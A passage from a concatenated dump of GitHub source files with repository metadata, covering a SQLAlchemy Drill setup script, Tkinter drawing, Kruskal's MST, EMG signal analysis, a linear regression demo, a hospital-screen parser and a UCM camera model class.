stage, vnfi.vnfiID, vnfi.node.getServerID()))\n else:\n raise ValueError(\n \"Unknown vnfi node type {0}\".format(\n type(vnfi.node)))\n","repo_name":"magaboomchen/SelfAdaptiveMano","sub_path":"sam/orchestration/test/unit/test_OSFCAdderDeleter.py","file_name":"test_OSFCAdderDeleter.py","file_ext":"py","file_size_in_byte":13013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70998382490","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport io\nfrom os import path\nfrom setuptools import setup, find_packages\n\nv = open(os.path.join(\n os.path.dirname(os.path.realpath(sys.argv[0])),\n 'sqlalchemy_drill',\n '__init__.py')\n)\nv.close()\n\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith io.open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(name='sqlalchemy_drill',\n version='1.1.4',\n description=\"Apache Drill for SQLAlchemy\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Database :: Front-Ends',\n ],\n install_requires=[\n \"requests\",\n \"ijson\",\n \"sqlalchemy\"\n ],\n extras_require={\n \"jdbc\": [\"JPype1\", \"JayDeBeApi\"],\n \"odbc\": [\"pyodbc\"],\n },\n keywords='SQLAlchemy Apache Drill',\n author='John Omernik, Charles Givre, Davide Miceli, Massimo Martiradonna'\n ', James Turton',\n author_email='john@omernik.com, cgivre@thedataist.com, davide.miceli.dap'\n '@gmail.com, massimo.martiradonna.dap@gmail.com, james@somecomputer.xyz',\n license='MIT',\n url='https://github.com/JohnOmernik/sqlalchemy-drill',\n download_url='https://github.com/JohnOmernik/sqlalchemy-drill/archive/'\n '1.1.4.tar.gz',\n packages=find_packages(),\n include_package_data=True,\n tests_require=['nose >= 0.11'],\n test_suite=\"nose.collector\",\n zip_safe=False,\n entry_points={\n 'sqlalchemy.dialects': [\n 'drill = sqlalchemy_drill.sadrill:DrillDialect_sadrill',\n 'drill.sadrill = sqlalchemy_drill.sadrill:DrillDialect_sadrill',\n 'drill.jdbc = sqlalchemy_drill.jdbc:DrillDialect_jdbc',\n 'drill.odbc = sqlalchemy_drill.odbc:DrillDialect_odbc',\n ]\n }\n )\n","repo_name":"JohnOmernik/sqlalchemy-drill","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"32"} +{"seq_id":"32287449297","text":"from tkinter import *\n\ndef draw_triangle(a,b,c):\n # determine corner points of triangle with sides a, b, c\n A=(0,0)\n B=(c,0)\n hc=(2 * (a ** 2 * b ** 2+b ** 2 * c ** 2+c ** 2 * a ** 2)-(a ** 4+b ** 4+c ** 4)) ** 0.5 / (2. * c)\n dx=(b ** 2-hc ** 2) ** 0.5\n if abs ((c-dx) ** 2+hc ** 2-a ** 2) > 0.01: dx=-dx # dx has two solutions\n C=(dx,hc)\n\n # move away from topleft, scale up a bit, convert to int\n coords=[int ((x+1) * 75) for x in A+B+C]\n\n # draw using Tkinter\n root=Tk ()\n canvas=Canvas (root,width = 1000,height = 1000)\n canvas.create_polygon (*coords)\n canvas.pack ()\n root.mainloop ()\n\n\ndef draw_rectangle(a,b):\n # determine corner points of triangle with sides a, b, c\n A,B,C,D=(0,0),(a,0),(a,b),(0,b)\n\n # move away from topleft, scale up a bit, convert to int\n coords=[int ((x+1) * 75) for x in A+B+C+D]\n\n # draw using Tkinter\n root=Tk ()\n canvas=Canvas (root,width = 1000,height = 1000)\n canvas.create_polygon (*coords)\n canvas.pack ()\n root.mainloop ()\n\n\ndef draw_circle(r):\n x,y=(300,300) # center coordinates\n\n x0,y0=x-20 * r,y-20 * r\n x1,y1=x+20 * r,y+20 * r\n\n # draw using Tkinter\n root=Tk ()\n canvas=Canvas (root,width = 1000,height = 1000)\n canvas.create_oval (x0,y0,x1,y1,fill = \"black\")\n canvas.pack ()\n root.mainloop ()\n\ntriangle_sides = [3,4,5]\nrectangle_sides = [3,4]\ncircle_radius = 5\n\ndraw_triangle (*triangle_sides)\ndraw_rectangle (*rectangle_sides)\ndraw_circle (circle_radius)","repo_name":"fidanfatih/PyCoders","sub_path":"plot_triangle_rectangle_circle/plot_them_all.py","file_name":"plot_them_all.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"7699359038","text":"class Graph:\n def __init__(self, V):\n self.V = V\n self.edges = []\n self.vertices = set()\n\n def addEdge(self, u, v, w):\n self.edges.append((u, v, w))\n self.vertices.add(u)\n self.vertices.add(v)\n\nclass UnionFind:\n def __init__(self, nodes):\n self.parent = {node: node for node in nodes}\n self.rank = {node: 0 for node in nodes}\n\n def find(self, x):\n if x != self.parent[x]:\n self.parent[x] = self.find(self.parent[x])\n return self.parent[x]\n\n def union(self, a, b):\n parentA, parentB = self.find(a), self.find(b)\n if self.rank[parentA] < self.rank[parentB]:\n self.parent[parentA] = parentB\n else:\n self.parent[parentB] = parentA\n if self.rank[parentA] == self.rank[parentB]:\n self.rank[parentA] += 1\n\nfrom collections import deque\n\ndef kruskalsMST(graph):\n unionFind = UnionFind(list(graph.vertices))\n\n edges = deque(sorted(graph.edges, key = lambda x : x[2]))\n res = []\n while len(res) < graph.V - 1:\n u, v, w = edges.popleft()\n uKey, vKey = unionFind.find(u), unionFind.find(v)\n if uKey != vKey:\n res += (u, v, w),\n unionFind.union(u, v)\n \n return res, sum([w for _, _, w in res])\n\nif __name__ == \"__main__\":\n g = Graph(4)\n g.addEdge(0, 1, 10)\n g.addEdge(0, 2, 6)\n g.addEdge(0, 3, 5)\n g.addEdge(1, 3, 15)\n g.addEdge(2, 3, 4)\n res, cost = kruskalsMST(g)\n print(\"cost of MST from kruskal's {} and resultant edges {}\".format(cost, res))","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Bloomberg/kruskals_impl.py","file_name":"kruskals_impl.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7127629112","text":"# BLOCKS\n# Recreates the half-pyramid of blocks at the end of world\n# 1-1 of mario bros. using a user-defined height\n\n\ndef getHeight(): # function to get a valid integer height (<23 blocks high)\n while True:\n try:\n towerHeight = int(input(\"Enter the tower height desired: \"))\n except ValueError:\n print(\"Please enter a number\")\n else:\n if 1 < towerHeight <23:\n return towerHeight\n \n\nheight = getHeight()\nfor i in range(2, height + 2): # start at 2 because top is always 2 blocks\n print(\" \" * (height + 1 - i) + \"#\" * i) # add empty spaces to right-justify\n # the pyramid\n \n\n","repo_name":"danhoying/python_practice_programs","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43249075458","text":"#!/usr/bin/env python\n\n\"\"\"\nEasy way to compare error categories in Ritmyndir and the metadata,\nchecking for new ones that need to be added.\n\n$ python ritmyndirchecker.py\n\n\"\"\"\nfrom reynir_correct.settings import RitmyndirDetails\nfrom reynir_correct.settings import Ritmyndir\n\nfrom typing import (\n Set,\n)\n\n# Error codes that are not explicitly an error\nIGNORE = set([\"GAM\", \"SO-ÞGF4ÞF\", \"OSB-BMYND\", \"SJALD\", \"STAD\", \"AV\"])\n\n\ndef main() -> None:\n ritmyndir = Ritmyndir()\n ritmyndir_details = RitmyndirDetails()\n allcodes: Set[str] = set()\n for entry in ritmyndir.DICT:\n allcodes.add(ritmyndir.get_code(entry))\n detcodes: Set[str] = set()\n for keycode in ritmyndir_details.DICT:\n detcodes.add(keycode)\n\n # Compare\n newcodes = allcodes - detcodes - IGNORE\n outdated = detcodes - allcodes - IGNORE\n\n print(\"=====================\")\n print(\"New codes:\")\n for item in newcodes:\n print(\"\\t{}\".format(item))\n print(\"=====================\")\n print(\"Outdated/unused codes:\")\n for item in outdated:\n print(\"\\t{}\".format(item))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mideind/GreynirCorrect","sub_path":"src/reynir_correct/tools/ritmyndirchecker.py","file_name":"ritmyndirchecker.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"2901843467","text":"import os, sys, time, random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\ndef load_sample_texts(url, current_files, ext=\"txt\"):\r\n for f in os.listdir(url):\r\n fp = os.path.join(url, f)\r\n if os.path.isfile(fp) and \".\"+str(ext) in f:\r\n current_files.append(fp)\r\n elif os.path.isdir(fp):\r\n current_files = load_sample_texts(fp, current_files, ext=ext)\r\n return current_files\r\ndef text_segmentation_and_labeling(text_data, total_segments, segment_size=100, pad_text=True, sequential=True,\r\n random_range=[32, 128]):\r\n segmented_text = []\r\n segmented_text_label = []\r\n if sequential:\r\n for i in range(len(text_data)):\r\n if len(segmented_text) >= total_segments:\r\n break\r\n text = text_data[i]\r\n if len(text) < segment_size and pad_text:\r\n for j in range(segment_size - len(text)):\r\n text = text + chr(random.randint(random_range[0], random_range[1]))\r\n if len(text) >= segment_size:\r\n for j in range(0, len(text), segment_size):\r\n if len(segmented_text) >= total_segments:\r\n break\r\n segment = text[j:j+segment_size]\r\n print(\"Creating label for: =\" + segment + \"=\")\r\n sentence_end_marker_str = str(input(\"Enter Sentence end markers\"))\r\n sentence_end_marker_arr = sentence_end_marker_str.split(\" \")\r\n sentence_end_marker_int_arr = [int(sentence_end_marker_arr[k]) for k in range(len(sentence_end_marker_arr))]\r\n print(\"Segmented sentence: \")\r\n for k in range(len(sentence_end_marker_int_arr)):\r\n if k == 0:\r\n print(segment[:sentence_end_marker_int_arr[k]])\r\n elif k < len(sentence_end_marker_int_arr)-1:\r\n print(segment[sentence_end_marker_int_arr[k-1]:sentence_end_marker_int_arr[k]])\r\n else:\r\n print(segment[sentence_end_marker_int_arr[k]:])\r\n\r\n\r\n\r\n\"\"\"\r\nDetection of sentences from a file\r\n1. Data Conversion from Text to Signal:\r\n Text file --> Raw Text --> text segmentation -->\r\n Ascii representation/Signal --> Remove unnecessary characters(e.g. newline, tab, etc.)\r\n\r\n2. Unnecessary Character list:\r\nNul(0) - US(31) except NewLine(10), 127 \r\n\r\n\"\"\"\r\n\r\n\r\n# Temporary: Detection of individual basic waveforms in a signal\r\nfrom scipy.signal import find_peaks\r\nfrom signal_analysis_functions import butter_bandpass_filter\r\nfrom dataset_functions import get_dataset\r\n\r\n# butter_bandpass_filter(data, cutoff_freqs, btype, fs, order=5)\r\n\r\nroot = 'dataset\\\\'\r\nbase = root + 'train\\\\als\\\\a01_patient\\\\N2001A01BB02\\\\'\r\nurls, labels, label_map = get_dataset(root, shuffle=True)\r\n\r\nfor index in range(len(urls)):\r\n plt.clf()\r\n data = np.load(os.path.join(urls[index], 'data.npy'))\r\n filtered = butter_bandpass_filter(data, [5, 10000], 'band', 23437.5, order=2)\r\n peak_ranges = {'low': [0, np.mean(filtered[filtered > 0]) - 1],\r\n 'high': [np.mean(filtered[filtered > 0]), np.amax(filtered)]}\r\n\r\n # Find peak\r\n print('Finding peak for peak range type: ' + str(range))\r\n peak, _ = find_peaks(filtered.copy(), height=peak_ranges['high'], distance=234)\r\n bep_eep = []\r\n print('Total Peak detected: ' + str(len(peak)))\r\n\r\n # Find BEP AND EEP\r\n last_traversed = 0\r\n if len(peak) > 0:\r\n for i in range(len(peak)):\r\n print('Tryng to estimate bep and eep for peak at ' + str(peak[i]))\r\n current_bep = last_traversed\r\n # Find BEP\r\n\r\n for j in range(last_traversed + 1, peak[i]):\r\n\r\n if abs(filtered[j] - filtered[j - 1]) / (filtered[j] - filtered[j - 1]) != abs(\r\n filtered[j + 1] - filtered[j]) / (filtered[j + 1] - filtered[j]):\r\n current_bep = j\r\n last_traversed = j\r\n # Find EEP\r\n current_eep = peak[i] + 1\r\n if i + 1 < len(peak) and peak[i+1] < len(filtered)-1:\r\n end = peak[i + 1]\r\n else:\r\n end = len(filtered)\r\n end = len(filtered)-1\r\n for j in range(peak[i] + 1, end):\r\n last_traversed = j\r\n if abs(filtered[j] - filtered[j - 1]) / (filtered[j] - filtered[j - 1]) != abs(\r\n filtered[j + 1] - filtered[j]) / (filtered[j + 1] - filtered[j]):\r\n current_eep = j\r\n break\r\n bep_eep.append([current_bep, current_eep])\r\n\r\n dist_b2p = np.asarray(peak) - np.asarray(bep_eep)[:, 0]\r\n amp_b2p = abs(filtered[np.asarray(peak)] - np.abs(filtered[np.asarray(bep_eep)[:, 0]]))\r\n dist_e2p = np.asarray(bep_eep)[:, 1] - np.asarray(peak)\r\n amp_e2p = abs(filtered[np.asarray(peak)] - np.abs(filtered[np.asarray(bep_eep)[:, 1]]))\r\n\r\n peak_area = [np.sum(filtered[bep_eep[i][0]: bep_eep[i][1]]**2) for i in range(len(peak))]\r\n print(\"Distance b2p: \" + str(dist_b2p.shape))\r\n print(\"Distance e2p: \" + str(dist_e2p.shape))\r\n plt.subplot(2, 1, 1)\r\n plt.title('Type: ' + str(label_map[labels[index]]).upper() + \", Left: \" + str(len(urls)-index))\r\n plt.plot(filtered)\r\n plt.plot(peak, filtered[peak], 'gx')\r\n plt.plot(np.asarray(bep_eep).flatten(), filtered[np.asarray(bep_eep).flatten()], 'rx')\r\n plt.grid()\r\n plt.subplot(2, 1, 2, projection='3d')\r\n im = plt.scatter(amp_b2p/dist_b2p, amp_e2p/dist_e2p,\r\n zs=peak_area, s=5, c=peak/len(filtered), cmap='hot')\r\n plt.gcf().colorbar(im, shrink=0.5, aspect=5)\r\n plt.grid()\r\n plt.xlabel('b2p[sqrt(width**2 + height**2)]')\r\n plt.ylabel('e2p[sqrt(width**2 + height**2)]')\r\n plt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"zuhairmhtb/EMGClassificationAlgorithms","sub_path":"test_area.py","file_name":"test_area.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"} +{"seq_id":"30447494574","text":"import torch\nimport shutil\nimport numpy as np\nimport random\nfrom torch import nn\nimport torch.nn.functional as F\n\n\ndef save_checkpoint(state, is_best, task_id, filename='checkpoint.pth'):\n torch.save(state, './' + str(task_id) + '/' + filename)\n if is_best:\n shutil.copyfile('./' + str(task_id) + '/' + filename, './' + str(task_id) + '/' + 'model_best.pth')\n\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\n\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\nclass CrossEntropyLoss2d(nn.Module):\n def __init__(self):\n super(CrossEntropyLoss2d, self).__init__()\n self.nll_loss = nn.NLLLoss(weight=None, reduction='mean')\n\n def forward(self, inputs):\n # pdb.set_trace()\n return self.nll_loss(F.log_softmax(inputs, dim=1))\n","repo_name":"ZaiyiHu/DSFormer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28283309052","text":"import os\n\nfrom .parse_mt_6 import MtSixParser\n\nMEDITECH_VERSION = 6\nDEBUG_LOG = False\nTABULAR_DISPLAY = False\n\ncoordinate_dictionary = {\n \"name_image\": {\"top\": {'x': 3, 'y': 28}, \"bottom\": {'x': 250, 'y': 47}},\n \"dob_image\": {\"top\": {'x': 25, 'y': 45}, \"bottom\": {'x': 230, 'y': 62}},\n \"ward_image\": {\"top\": {'x': 2, 'y': 62}, \"bottom\": {'x': 250, 'y': 80}},\n \"mrn_image\": {\"top\": {'x': 990, 'y': 26}, \"bottom\": {'x': 1115, 'y': 44}}\n}\ncolor_dictionary = {\n \"table_outer_border_color\": {'r': 102, 'g': 119, 'b': 204},\n \"table_date_border_color\": {'r': 150, 'g': 150, 'b': 150},\n \"table_inner_border_color\": {'r': 230, 'g': 230, 'b': 230},\n \"patient_list_inner_border_color\": {'r': 230, 'g': 230, 'b': 230},\n \"patient_list_outer_border_color\": {'r': 102, 'g': 119, 'b': 204},\n # not used yet. Maybe if current logic is not enough to extract all information\n \"patient_list_header_bottom_color\": {'r': 150, 'g': 150, 'b': 150},\n # not used yet. Maybe if current logic is not enough to extract all information\n}\n\nmrn_regex_match = \"(\\w\\w\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d)\"\n\nward_list_name = [\"1SOBS\", \"2SICU\", \"3NMEDONC\", \"3SCARD\", \"4MS4W\", \"4SSUR\", \"6PED\", \"5NMEDONC\", \"6NMEDSUR\"]\n\nward_map = {\n \"iSOBS\": \"1SOBS\",\n \"1S0BS\": \"1SOBS\",\n \"iS0BS\": \"1SOBS\"\n }\n\n\ndef get_patient_data(parse_image_path, time_zone):\n \"\"\"\n Parse patient data table in body\n :return:\n \"\"\"\n parser = MtSixParser(coordinate_dict=coordinate_dictionary,\n color_dict=color_dictionary,\n image_path=parse_image_path)\n return parser.create_array_to_post_to_parser(parser.parse_table_data(), time_zone)\n\n\ndef get_patient_header(parse_image_path):\n \"\"\"\n Parse patient demographics\n :return:\n \"\"\"\n parser = MtSixParser(coordinate_dict=coordinate_dictionary,\n color_dict=color_dictionary,\n image_path=parse_image_path)\n return parser.parse_header(ward_names=ward_list_name, ward_map=ward_map)\n\n\ndef get_patient_list(parse_image_path):\n \"\"\"\n parse patient ID list\n :return:\n \"\"\"\n parser = MtSixParser(coordinate_dict=coordinate_dictionary,\n color_dict=color_dictionary,\n image_path=parse_image_path)\n return parser.parse_patient_list()\n\n\ndef get_initial_date_of_birth_and_ward_check():\n \"\"\"\n Check if current patient is above 18.\n :return: True if patient is above 18\n \"\"\"\n parser = MtSixParser(coordinate_dict=coordinate_dictionary,\n color_dict=color_dictionary)\n return parser.patient_age_and_ward_check_pass(ward_names=ward_list_name, ward_map=ward_map)\n","repo_name":"jamycoder34/Data-Science","sub_path":"helpers/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33109395005","text":"import unittest\n\nfrom parts.cells.CellCollection import CellCollection\nfrom parts.BrainFactory import BrainFactory\n\nfrom Thing import Thing\nfrom World import World\n\nfrom parts.Genome import Genome\nfrom parts.Brain import Brain\n\n\nclass TestActionsFromBrainInWorld(unittest.TestCase):\n\n def test_conditions(self):\n world = World(1000)\n start_pos = (20, 20)\n thing = Thing(start_pos, world)\n potential_cells = CellCollection(thing)\n # minimal conditions for tests\n self.assertGreaterEqual(len(potential_cells.get_sensors()), 0)\n self.assertGreaterEqual(len(potential_cells.get_actuators()), 4)\n self.assertGreaterEqual(len(potential_cells.get_neurons()), 2)\n\n def test_brain_move_south_east(self):\n\n world = World(1000)\n start_pos = (20, 20)\n thing = Thing(start_pos, world)\n\n factory = BrainFactory()\n potential_cells = CellCollection(thing)\n\n east = potential_cells.actuators[0]\n south = potential_cells.actuators[3]\n\n brain = self.get_south_east_brain(factory, potential_cells)\n brain.clear_unused_cells()\n self.assertEqual(4, len(brain.all_cells))\n self.assertEqual(0, len(brain.sensors))\n self.assertEqual(2, len(brain.neurons))\n self.assertEqual(2, len(brain.actuators))\n self.assertEqual(east, brain.actuators[0])\n self.assertEqual(south, brain.actuators[1])\n self.assertEqual(east,brain.connections[0].sink)\n self.assertEqual(south,brain.connections[1].sink)\n thing.brain = brain\n self.assertEqual(start_pos, thing.pos)\n world.things = []\n world.add_thing_to_world(thing)\n self.assertEqual(1, len(world.things))\n self.assertEqual(thing, world.things[0])\n self.assertIsNotNone(world.thing_at(start_pos))\n self.assertEqual(thing, world.thing_at(start_pos))\n\n for con in brain.connections:\n con.strength = 4.0\n for act in brain.actuators:\n act.value = 0.0\n for n in brain.neurons:\n n.value = 1.0\n\n world.one_step_all()\n self.assertGreater(brain.actuators[0].value, 0.5)\n self.assertGreater(brain.actuators[1].value, 0.5)\n self.assertIsNone(world.thing_at(start_pos))\n self.assertEqual((21, 21), thing.pos)\n self.assertEqual(thing, world.thing_at(thing.pos))\n\n @staticmethod\n def get_south_east_brain(factory, potential_cells):\n # build - genome for connections\n genes = [\n # Nuron0 -> Actuator0\n factory.make_gene_from_settings_array([[1, 0], [0, 0], 0]),\n # Nuron1 -> Actuator3\n factory.make_gene_from_settings_array([[1, 1], [0, 3], 0])\n ]\n\n # make Genome with fixed genes - for testing\n genome = Genome(genes)\n brain = Brain(genome, potential_cells)\n return brain\n","repo_name":"Terry-Weymouth/PyGameWorldDaveMiller","sub_path":"tests/integration/test_actions_from_brain_in_world.py","file_name":"test_actions_from_brain_in_world.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40924304832","text":"\"\"\"\nmove files that don't start with . to a folder, leaving only directories\n\nexample: python -m pyutils.moveit thedir\n\"\"\"\n\nimport argparse\nimport re, os\nimport tempfile\nfrom pathlib import Path\nimport errno, sys\n\ndotre = re.compile(r'^\\..*')\n\n\ndef mkdir_p(path):\n try:\n os.makedirs(path, exist_ok=False)\n print('made: ', dirname)\n except OSError as exc:\n if exc.errno == errno.EEXIST:\n print('{} already exists'.format(path))\n else:\n #permission error, etc.\n raise\n\n\nif __name__ == \"__main__\":\n\n linebreaks = argparse.RawTextHelpFormatter\n descrip = __doc__.lstrip()\n parser = argparse.ArgumentParser(formatter_class=linebreaks,\n description=descrip)\n parser.add_argument(\n 'dir', nargs='?',\n type=str, help='optional directory name')\n args = parser.parse_args()\n if args.dir:\n dirname = args.dir\n mkdir_p(dirname)\n else:\n confirm = input(\"confirm creation of temporary directory {}: y/n \")\n if confirm == 'y':\n dirname = tempfile.mkdtemp(prefix='holdit_', dir='.')\n p = Path('.')\n for x in p.iterdir():\n if x.is_dir() or dotre.match(str(x)):\n continue\n newfile = Path(dirname) / x\n x.rename(newfile)\n","repo_name":"phaustin/pythonlibs","sub_path":"pyutils/pyutils/move_files.py","file_name":"move_files.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43748630066","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\n\ndata = pd.read_csv(\"kc_house_data.csv\")\nspace = data['sqft_living']\nprice = data['price']\nprint (price)\nspace = space / 100.0\nprice = price / 10000.0\nspace_arr = np.array(space).reshape(-1, 1)\nprice_arr = np.array(price).reshape(-1, 1)\n\nprint (space_arr[0])\nprint (price_arr.shape)\nprint (price_arr[0])\n\nfrom sklearn.model_selection import train_test_split\nspace_train, space_test, price_train, price_test = train_test_split(space_arr,price_arr,test_size=0.4,train_size=0.6)\n# min-max normalization\ndef MaxMinNormalization(x):\n \"\"\"[0,1] normaliaztion\"\"\"\n x = (x - np.min(x)) / (np.max(x) - np.min(x))\n return x\n\ndef linear_regression(space_data, price_data, learning_rate):\n # learning_rate = 0.001\n initial_b = 0\n initial_m = 0\n # number of iterative\n num_iter = 300\n\n [b, m] = optimizer(space_data, price_data, initial_b, initial_m, learning_rate, num_iter)\n# plot the data here\n print (b, m)\n return b, m\n\ndef optimizer(space_data, price_data, initial_b, initial_m, learning_rate, num_iter):\n b = initial_b\n m = initial_m\n\n for i in range(num_iter):\n b, m = compute_gradient(b, m, space_data, price_data, learning_rate)\n\n if i % 10 == 0:\n print ('Iter: %s'%i, 'error: %s'%compute_error(b, m, space_data, price_data))\n\n return [b, m]\n\n# gradient descent function\ndef compute_gradient(b_cur, m_cur, space_data, price_data, learning_rate):\n b_gradient = 0\n m_gradient = 0\n\n N = float(len(space_data))\n\n for i in range(0, len(space_data)):\n x = space_data[i]\n y = price_data[i]\n b_gradient += -(2 / N) * (y - ((m_cur * x) + b_cur))\n m_gradient += -(2 / N) * x * (y - ((m_cur * x) + b_cur))\n\n b_next = b_cur + (-learning_rate * b_gradient)\n m_next = m_cur + (-learning_rate * m_gradient)\n return (b_next, m_next)\n# cost function\ndef compute_error(b, m, space_data, price_data):\n for i in range(len(space_data)):\n x = space_data[i]\n y = price_data[i]\n totalError = (y - m * x - b) ** 2\n totalError = np.sum(totalError, axis=0)\n return totalError/len(space_data)\n\nif __name__ == '__main__':\n # training result\n start = time.thread_time()\n b, m = linear_regression(space_train, price_train, 0.0005)\n end = time.thread_time()\n print ('Time used: {}'.format(end - start))\n # visualize the test results\n plt.scatter(space_test, price_test, color='green')\n axes = plt.gca()\n x_vals = np.array(axes.get_xlim())\n y_vals = b + m * x_vals\n plt.plot(x_vals, y_vals, '--', color='blue')\n plt.title(\"Visuals for Test DataSet\")\n plt.xlabel(\"Space\")\n plt.ylabel(\"Price\")\n plt.show()\n","repo_name":"Siyuan-gwu/Machine-Learning-Linear-Regression-Housing-prices","sub_path":"venv/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21721605500","text":"import torch\n\nfrom vidar.geometry.cameras.base import CameraBase\nfrom vidar.utils.types import is_seq\n\n\nclass CameraUCM(CameraBase):\n \"\"\"UCM camera class (Unified Camera Model)\"\"\"\n def __init__(self, K, *args, **kwargs):\n self._K = K\n super().__init__(*args, **kwargs)\n\n @staticmethod\n def from_list(cams):\n \"\"\"Create a single camera from a list of cameras\"\"\"\n K = torch.cat([cam.K for cam in cams], 0)\n Twc = torch.cat([cam.Twc.T for cam in cams], 0)\n return CameraUCM(K=K, Twc=Twc, hw=cams[0].hw)\n\n @staticmethod\n def from_dict(K, hw, Twc=None):\n \"\"\"Create a single camera from a dictionary of cameras\"\"\"\n return {key: CameraUCM(\n K=K[key] if key in K else K[0],\n hw=hw[key], Twc=val\n ) for key, val in Twc.items()}\n\n @staticmethod\n def from_list(cams):\n \"\"\"Create a single camera from a list of cameras\"\"\"\n K = torch.cat([cam.K for cam in cams], 0)\n Twc = torch.cat([cam.Twc.T for cam in cams], 0)\n return CameraUCM(K=K, Twc=Twc, hw=cams[0].hw)\n\n @staticmethod\n def from_dict(K, hw, Twc=None):\n \"\"\"Create a single camera from a dictionary of cameras\"\"\"\n return {key: CameraUCM(K=K[0], hw=hw[0], Twc=val) for key, val in Twc.items()}\n\n @property\n def fx(self):\n \"\"\"Focal length in x\"\"\"\n return self._K[:, 0].unsqueeze(1)\n\n @property\n def fy(self):\n \"\"\"Focal length in y\"\"\"\n return self._K[:, 1].unsqueeze(1)\n\n @property\n def cx(self):\n \"\"\"Principal point in x\"\"\"\n return self._K[:, 2].unsqueeze(1)\n\n @property\n def cy(self):\n \"\"\"Principal point in y\"\"\"\n return self._K[:, 3].unsqueeze(1)\n\n @property\n def alpha(self):\n \"\"\"alpha in UCM model\"\"\"\n return self._K[:, 4].unsqueeze(1)\n\n def scaled(self, scale_factor):\n \"\"\"Scale the camera intrinsics\"\"\"\n if scale_factor is None or scale_factor == 1:\n return self\n if is_seq(scale_factor):\n if len(scale_factor) == 4:\n scale_factor = scale_factor[-2:]\n scale_factor = [float(scale_factor[i]) / float(self._hw[i]) for i in range(2)]\n else:\n scale_factor = [scale_factor] * 2\n K = self._K.clone()\n K[:, 0] *= scale_factor[0]\n K[:, 1] *= scale_factor[1]\n K[:, 2] *= scale_factor[0]\n K[:, 3] *= scale_factor[1]\n return type(self)(\n K=K,\n hw=[int(self._hw[i] * scale_factor[i]) for i in range(len(self._hw))],\n Twc=self._Twc\n )\n\n def lift(self, grid):\n \"\"\"Lift a grid of pixels to 3D points\"\"\"\n fx, fy, cx, cy, alpha = self.fx, self.fy, self.cx, self.cy, self.alpha\n\n u = grid[:, 0]\n v = grid[:, 1]\n\n mx = (u - cx) / fx * (1 - alpha)\n my = (v - cy) / fy * (1 - alpha)\n r_square = mx ** 2 + my ** 2\n xi = alpha / (1 - alpha)\n coeff = (xi + torch.sqrt(1 + (1 - xi ** 2) * r_square)) / (1 + r_square)\n\n x = coeff * mx\n y = coeff * my\n z = coeff * 1 - xi\n z = z.clamp(min=1e-7)\n\n x_norm = x / z\n y_norm = y / z\n z_norm = z / z\n\n return torch.stack((x_norm, y_norm, z_norm), dim=1).float()\n\n def unlift(self, points, from_world, euclidean=False):\n \"\"\"Unlift a grid of pixels to 3D points\"\"\"\n if from_world:\n points = self.Twc * points\n\n d = torch.norm(points, dim=1)\n fx, fy, cx, cy, alpha = self.fx, self.fy, self.cx, self.cy, self.alpha\n x, y, z = points[:, 0], points[:, 1], points[:, 2]\n z = z.clamp(min=1e-7)\n\n x = fx * x / (alpha * d + (1 - alpha) * z + 1e-7) + cx\n y = fy * y / (alpha * d + 